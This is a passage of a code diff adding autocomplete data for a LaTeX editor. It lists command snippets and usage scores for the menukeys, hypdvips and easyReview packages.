'\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'menukeys-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'menukeys-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'menukeys-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'menukeys-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'menukeys-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'menukeys-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'menukeys-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'menukeys-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'menukeys-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'menukeys-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'menukeys-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'menukeys-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'menukeys-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'menukeys-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'menukeys-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'menukeys-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'menukeys-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'menukeys-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'menukeys-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'menukeys-cmd', + score: 0.2864294797053033, + }, + ], + hypdvips: [ + { + caption: '\\begin{}', + snippet: '\\begin{$1}', + meta: 'hypdvips-cmd', + score: 7.849662248028187, + }, + { + caption: '\\begin{}[]', + snippet: '\\begin{$1}[$2]', + meta: 'hypdvips-cmd', + score: 7.849662248028187, + }, + { + caption: '\\begin{}{}', + snippet: '\\begin{$1}{$2}', + meta: 'hypdvips-cmd', + score: 7.849662248028187, + }, + { + caption: '\\author{}', + snippet: '\\author{$1}', + meta: 'hypdvips-cmd', + score: 0.8973590434087177, + }, + { + caption: '\\author[]{}', + snippet: '\\author[$1]{$2}', + meta: 'hypdvips-cmd', + score: 0.8973590434087177, + }, + { + caption: '\\title{}', + snippet: '\\title{$1}', + meta: 'hypdvips-cmd', + score: 0.9202908262245683, + }, + { + caption: '\\end{}', + snippet: '\\end{$1}', + meta: 'hypdvips-cmd', + score: 7.847906405228455, + }, + { + caption: '\\clearpage', + snippet: '\\clearpage', + meta: 'hypdvips-cmd', + score: 0.1789117552185788, + }, + { + caption: '\\global', + snippet: '\\global', + meta: 'hypdvips-cmd', + score: 0.006609629561859019, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'hypdvips-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hypdvips-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'hypdvips-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'hypdvips-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\AtBeginShipout{}', + snippet: '\\AtBeginShipout{$1}', + meta: 'hypdvips-cmd', + score: 0.00047530324346933345, + }, + { + caption: '\\AtBeginShipoutNext{}', + snippet: '\\AtBeginShipoutNext{$1}', + meta: 'hypdvips-cmd', + score: 0.0005277905480209891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hypdvips-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\UrlBreaks{}', + snippet: '\\UrlBreaks{$1}', + meta: 'hypdvips-cmd', + score: 0.001030592515645366, + }, + { + caption: '\\UrlBreaks', + snippet: '\\UrlBreaks', + meta: 'hypdvips-cmd', + score: 0.001030592515645366, + }, + { + caption: '\\Url', + snippet: '\\Url', + meta: 'hypdvips-cmd', + score: 0.0002854206807593436, + }, + { + caption: '\\UrlOrds{}', + snippet: '\\UrlOrds{$1}', + meta: 'hypdvips-cmd', + score: 0.0006882563723629154, + }, + { + caption: '\\UrlOrds', + snippet: '\\UrlOrds', + meta: 'hypdvips-cmd', + score: 0.0006882563723629154, + }, + { + caption: '\\urlstyle{}', + snippet: '\\urlstyle{$1}', + meta: 'hypdvips-cmd', + score: 0.010515056688180681, + }, + { + caption: '\\urldef{}', + snippet: '\\urldef{$1}', + meta: 'hypdvips-cmd', + score: 0.008041789461944983, + }, + { + caption: '\\UrlBigBreaks{}', + snippet: '\\UrlBigBreaks{$1}', + meta: 'hypdvips-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\UrlFont{}', + snippet: '\\UrlFont{$1}', + meta: 'hypdvips-cmd', + score: 0.0032990580087398644, + }, + { + caption: '\\UrlSpecials{}', + snippet: '\\UrlSpecials{$1}', + meta: 'hypdvips-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\UrlNoBreaks', + snippet: '\\UrlNoBreaks', + meta: 'hypdvips-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\nameref{}', + snippet: '\\nameref{$1}', + meta: 'hypdvips-cmd', + score: 0.009472569279662113, + }, + { + caption: '\\pdfbookmark[]{}{}', + snippet: '\\pdfbookmark[$1]{$2}{$3}', + meta: 'hypdvips-cmd', + score: 0.006492248863367502, + }, + { + caption: '\\figureautorefname', + snippet: '\\figureautorefname', + meta: 'hypdvips-cmd', + score: 0.00014582556188448738, + }, + { + caption: '\\figureautorefname{}', + snippet: '\\figureautorefname{$1}', + meta: 'hypdvips-cmd', + score: 0.00014582556188448738, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'hypdvips-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'hypdvips-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'hypdvips-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\footnoteautorefname', + snippet: '\\footnoteautorefname', + meta: 'hypdvips-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\roman{}', + snippet: '\\roman{$1}', + meta: 'hypdvips-cmd', + score: 0.005553384455935491, + }, + { + caption: '\\roman', + snippet: '\\roman', + meta: 'hypdvips-cmd', + score: 0.005553384455935491, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'hypdvips-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\MakeLowercase{}', + snippet: '\\MakeLowercase{$1}', + meta: 'hypdvips-cmd', + score: 0.017289599800633146, + }, + { + caption: '\\textunderscore', + snippet: '\\textunderscore', + meta: 'hypdvips-cmd', + score: 0.001509072212764015, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'hypdvips-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\begin{}', + snippet: '\\begin{$1}', + meta: 'hypdvips-cmd', + score: 7.849662248028187, + }, + { + caption: '\\begin{}[]', + snippet: '\\begin{$1}[$2]', + meta: 'hypdvips-cmd', + score: 7.849662248028187, + }, + { + caption: '\\begin{}{}', + snippet: '\\begin{$1}{$2}', + meta: 'hypdvips-cmd', + score: 7.849662248028187, + }, + { + caption: '\\FancyVerbLineautorefname', + snippet: '\\FancyVerbLineautorefname', + meta: 'hypdvips-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\hyperlink{}{}', + snippet: '\\hyperlink{$1}{$2}', + meta: 'hypdvips-cmd', + score: 0.00978652043902115, + }, + { + caption: '\\tableautorefname', + snippet: '\\tableautorefname', + meta: 'hypdvips-cmd', + score: 0.00012704528567339081, + }, + { + caption: '\\tableautorefname{}', + snippet: '\\tableautorefname{$1}', + meta: 'hypdvips-cmd', + score: 0.00012704528567339081, + }, + { + caption: '\\equationautorefname', + snippet: '\\equationautorefname', + meta: 'hypdvips-cmd', + score: 0.00018777198999871106, + }, + { + caption: '\\equationautorefname{}', + snippet: '\\equationautorefname{$1}', + meta: 'hypdvips-cmd', + score: 0.00018777198999871106, + }, + { + caption: '\\chapterautorefname', + snippet: '\\chapterautorefname', + meta: 'hypdvips-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\TeX', + snippet: '\\TeX', + meta: 'hypdvips-cmd', + score: 0.02873756018238537, + }, + { + caption: '\\TeX{}', + snippet: '\\TeX{$1}', + meta: 'hypdvips-cmd', + score: 0.02873756018238537, + }, + { + caption: '\\protect', + snippet: '\\protect', + meta: 'hypdvips-cmd', + score: 0.0200686676229443, + }, + { + caption: '\\appendixautorefname', + snippet: '\\appendixautorefname', + meta: 'hypdvips-cmd', + score: 7.950698053641679e-5, + }, + { + caption: '\\appendixautorefname{}', + snippet: '\\appendixautorefname{$1}', + meta: 'hypdvips-cmd', + score: 7.950698053641679e-5, + }, + { + caption: '\\newlabel{}{}', + snippet: '\\newlabel{$1}{$2}', + meta: 'hypdvips-cmd', + score: 0.00029737672328168955, + }, + { + caption: '\\texorpdfstring{}{}', + snippet: '\\texorpdfstring{$1}{$2}', + meta: 'hypdvips-cmd', + score: 0.0073781967296121, + }, + { + caption: '\\refstepcounter{}', + snippet: '\\refstepcounter{$1}', + meta: 'hypdvips-cmd', + score: 0.002140559856649122, + }, + { + caption: '\\alph', + snippet: '\\alph', + meta: 'hypdvips-cmd', + score: 0.01034327266194849, + }, + { + caption: '\\alph{}', + snippet: '\\alph{$1}', + meta: 'hypdvips-cmd', + score: 0.01034327266194849, + }, + { + caption: '\\pageref{}', + snippet: '\\pageref{$1}', + meta: 'hypdvips-cmd', + score: 0.019788865471151957, + }, + { + caption: '\\item', + snippet: '\\item ', + meta: 'hypdvips-cmd', + score: 3.800886892251021, + }, + { + caption: '\\item[]', + snippet: '\\item[$1] ', + meta: 'hypdvips-cmd', + score: 3.800886892251021, + }, + { + caption: '\\LaTeX', + snippet: '\\LaTeX', + meta: 'hypdvips-cmd', + score: 0.2334089308452787, + }, + { + caption: '\\LaTeX{}', + snippet: '\\LaTeX{$1}', + meta: 'hypdvips-cmd', + score: 0.2334089308452787, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hypdvips-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\itemautorefname', + snippet: '\\itemautorefname', + meta: 'hypdvips-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\caption{}', + snippet: '\\caption{$1}', + meta: 'hypdvips-cmd', + score: 1.2569477427490174, + }, + { + caption: '\\sectionautorefname', + snippet: '\\sectionautorefname', + meta: 'hypdvips-cmd', + score: 0.0019832324299155183, + }, + { + caption: '\\sectionautorefname{}', + snippet: '\\sectionautorefname{$1}', + meta: 'hypdvips-cmd', + score: 0.0019832324299155183, + }, + { + caption: '\\LaTeXe', + snippet: '\\LaTeXe', + meta: 'hypdvips-cmd', + score: 0.007928096378157487, + }, + { + caption: '\\LaTeXe{}', + snippet: '\\LaTeXe{$1}', + meta: 'hypdvips-cmd', + score: 0.007928096378157487, + }, + { + caption: '\\footref{}', + snippet: '\\footref{$1}', + meta: 'hypdvips-cmd', + score: 0.0003680857021151614, + }, + { + caption: '\\footref', + snippet: '\\footref', + meta: 'hypdvips-cmd', + score: 0.0003680857021151614, + }, + { + caption: '\\hypertarget{}{}', + snippet: '\\hypertarget{$1}{$2}', + meta: 'hypdvips-cmd', + score: 0.009652820108904094, + }, + { + caption: '\\theoremautorefname', + snippet: '\\theoremautorefname', + meta: 'hypdvips-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\maketitle', + snippet: '\\maketitle', + meta: 'hypdvips-cmd', + score: 0.7504160124360846, + }, + { + caption: '\\subparagraphautorefname', + snippet: '\\subparagraphautorefname', + meta: 'hypdvips-cmd', + score: 0.0005446476945175932, + }, + { + caption: '\\url{}', + snippet: '\\url{$1}', + meta: 'hypdvips-cmd', + score: 0.13586474005868793, + }, + { + caption: '\\author{}', + snippet: '\\author{$1}', + meta: 'hypdvips-cmd', + score: 0.8973590434087177, + }, + { + caption: '\\author[]{}', + snippet: '\\author[$1]{$2}', + meta: 'hypdvips-cmd', + score: 0.8973590434087177, + }, + { + caption: '\\href{}{}', + snippet: '\\href{$1}{$2}', + meta: 'hypdvips-cmd', + score: 0.27111130260612365, + }, + { + caption: '\\Roman{}', + snippet: '\\Roman{$1}', + meta: 'hypdvips-cmd', + score: 0.0038703587462843594, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'hypdvips-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\autoref{}', + snippet: '\\autoref{$1}', + meta: 'hypdvips-cmd', + score: 0.03741172773691362, + }, + { + caption: '\\nolinkurl{}', + snippet: '\\nolinkurl{$1}', + meta: 'hypdvips-cmd', + score: 0.0004995635515943437, + }, + { + caption: '\\end{}', + snippet: '\\end{$1}', + meta: 'hypdvips-cmd', + score: 7.847906405228455, + }, + { + caption: '\\phantomsection', + snippet: '\\phantomsection', + meta: 'hypdvips-cmd', + score: 0.0174633138331273, + }, + { + caption: '\\MakeUppercase{}', + snippet: '\\MakeUppercase{$1}', + meta: 'hypdvips-cmd', + score: 0.006776001543888959, + }, + { + caption: '\\MakeUppercase', + snippet: '\\MakeUppercase', + meta: 'hypdvips-cmd', + score: 0.006776001543888959, + }, + { + caption: '\\partautorefname', + snippet: '\\partautorefname', + meta: 'hypdvips-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\Itemautorefname{}', + snippet: '\\Itemautorefname{$1}', + meta: 'hypdvips-cmd', + score: 6.006262128895586e-5, + }, + { + caption: '\\halign{}', + snippet: '\\halign{$1}', + meta: 'hypdvips-cmd', + score: 0.00017906650306643613, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'hypdvips-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\ref{}', + snippet: '\\ref{$1}', + meta: 'hypdvips-cmd', + score: 1.4380093454211778, + }, + { + caption: '\\Alph{}', + snippet: '\\Alph{$1}', + meta: 'hypdvips-cmd', + score: 0.002233258780143355, + }, + { + caption: '\\Alph', + snippet: '\\Alph', + meta: 'hypdvips-cmd', + score: 0.002233258780143355, + }, + { + caption: '\\appendix', + snippet: '\\appendix', + meta: 'hypdvips-cmd', + score: 0.047007158741781095, + }, + { + caption: '\\MP', + snippet: '\\MP', + meta: 'hypdvips-cmd', + score: 0.00018344383742255004, + }, + { + caption: '\\MP{}', + snippet: '\\MP{$1}', + meta: 'hypdvips-cmd', + score: 0.00018344383742255004, + }, + { + caption: '\\paragraphautorefname', + snippet: '\\paragraphautorefname', + meta: 'hypdvips-cmd', + score: 0.0005446476945175932, + }, + { + caption: '\\citeN{}', + snippet: '\\citeN{$1}', + meta: 'hypdvips-cmd', + score: 0.0018503938529945614, + }, + { + caption: '\\citeN', + snippet: '\\citeN', + meta: 'hypdvips-cmd', + score: 0.0018503938529945614, + }, + { + caption: '\\addcontentsline{}{}{}', + snippet: '\\addcontentsline{$1}{$2}{$3}', + meta: 'hypdvips-cmd', + score: 0.07503475348393239, + }, + { + caption: '\\subsectionautorefname', + snippet: '\\subsectionautorefname', + meta: 'hypdvips-cmd', + score: 0.0012546605780895737, + }, + { + caption: '\\subsectionautorefname{}', + snippet: '\\subsectionautorefname{$1}', + meta: 'hypdvips-cmd', + score: 0.0012546605780895737, + }, + { + caption: '\\hyperref[]{}', + snippet: '\\hyperref[$1]{$2}', + meta: 'hypdvips-cmd', + score: 0.004515152477030062, + }, + { + caption: '\\arabic{}', + snippet: '\\arabic{$1}', + meta: 'hypdvips-cmd', + score: 0.02445837629741638, + }, + { + caption: '\\arabic', + snippet: '\\arabic', + meta: 'hypdvips-cmd', + score: 0.02445837629741638, + }, + { + caption: '\\newline', + snippet: '\\newline', + meta: 'hypdvips-cmd', + score: 0.3311721696201715, + }, + { + caption: '\\hypersetup{}', + snippet: '\\hypersetup{$1}', + meta: 'hypdvips-cmd', + score: 0.06967310843464661, + }, + { + caption: '\\subsubsectionautorefname', + snippet: '\\subsubsectionautorefname', + meta: 'hypdvips-cmd', + score: 0.0012064581899162352, + }, + { + caption: '\\subsubsectionautorefname{}', + snippet: '\\subsubsectionautorefname{$1}', + meta: 'hypdvips-cmd', + score: 0.0012064581899162352, + }, + { + caption: '\\title{}', + snippet: '\\title{$1}', + meta: 'hypdvips-cmd', + score: 0.9202908262245683, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'hypdvips-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hypdvips-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hypdvips-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hypdvips-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hypdvips-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hypdvips-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hypdvips-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hypdvips-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hypdvips-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hypdvips-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'hypdvips-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hypdvips-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hypdvips-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'hypdvips-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hypdvips-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hypdvips-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hypdvips-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hypdvips-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'hypdvips-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hypdvips-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\pdfbookmark[]{}{}', + snippet: '\\pdfbookmark[$1]{$2}{$3}', + meta: 'hypdvips-cmd', + score: 0.006492248863367502, + }, + { + caption: '\\bookmarkget{}', + snippet: '\\bookmarkget{$1}', + meta: 'hypdvips-cmd', + score: 0.00026847053008917257, + }, + { + caption: '\\bookmarksetup{}', + snippet: '\\bookmarksetup{$1}', + meta: 'hypdvips-cmd', + score: 0.001134118016265821, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hypdvips-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'hypdvips-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'hypdvips-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'hypdvips-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hypdvips-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hypdvips-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\check{}', + snippet: '\\check{$1}', + meta: 'hypdvips-cmd', + score: 0.0058342578961340175, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'hypdvips-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hypdvips-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hypdvips-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hypdvips-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'hypdvips-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'hypdvips-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'hypdvips-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hypdvips-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hypdvips-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hypdvips-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hypdvips-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'hypdvips-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'hypdvips-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'hypdvips-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'hypdvips-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'hypdvips-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'hypdvips-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'hypdvips-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'hypdvips-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'hypdvips-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'hypdvips-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'hypdvips-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hypdvips-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'hypdvips-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'hypdvips-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'hypdvips-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'hypdvips-cmd', + score: 0.2864294797053033, + }, + ], + easyReview: [ + { + caption: '\\highlight{}', + snippet: '\\highlight{$1}', + meta: 'easyReview-cmd', + score: 0.00021546602164732416, + }, + { + caption: '\\highlight', + snippet: '\\highlight', + meta: 'easyReview-cmd', + score: 0.00021546602164732416, + }, + { + caption: '\\alert{}', + snippet: '\\alert{$1}', + meta: 'easyReview-cmd', + score: 0.02756568949970745, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'easyReview-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'easyReview-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'easyReview-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'easyReview-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'easyReview-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'easyReview-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'easyReview-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'easyReview-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'easyReview-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'easyReview-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'easyReview-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'easyReview-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'easyReview-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'easyReview-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'easyReview-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'easyReview-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\missingfigure[]{}', + snippet: '\\missingfigure[$1]{$2}', + meta: 'easyReview-cmd', + score: 0.001558719179721163, + }, + { + caption: '\\missingfigure', + snippet: '\\missingfigure', + meta: 'easyReview-cmd', + score: 0.001558719179721163, + }, + { + caption: '\\todototoc', + snippet: '\\todototoc', + meta: 'easyReview-cmd', + score: 0.000325977535138643, + }, + { + caption: '\\todo{}', + snippet: '\\todo{$1}', + meta: 'easyReview-cmd', + score: 0.04115074278362878, + }, + { + caption: '\\todo[]{}', + snippet: '\\todo[$1]{$2}', + meta: 'easyReview-cmd', + score: 0.04115074278362878, + }, + { + caption: '\\todo', + snippet: '\\todo', + meta: 'easyReview-cmd', + score: 0.04115074278362878, + }, + { + caption: '\\listoftodos', + snippet: '\\listoftodos', + meta: 'easyReview-cmd', + score: 0.0005325975940754609, + }, + { + caption: '\\listoftodos[]', + snippet: '\\listoftodos[$1]', + meta: 'easyReview-cmd', + score: 0.0005325975940754609, + }, + { + caption: '\\phantomsection', + snippet: '\\phantomsection', + meta: 'easyReview-cmd', + score: 0.0174633138331273, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'easyReview-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'easyReview-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'easyReview-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'easyReview-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'easyReview-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'easyReview-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'easyReview-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'easyReview-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'easyReview-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'easyReview-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'easyReview-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'easyReview-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 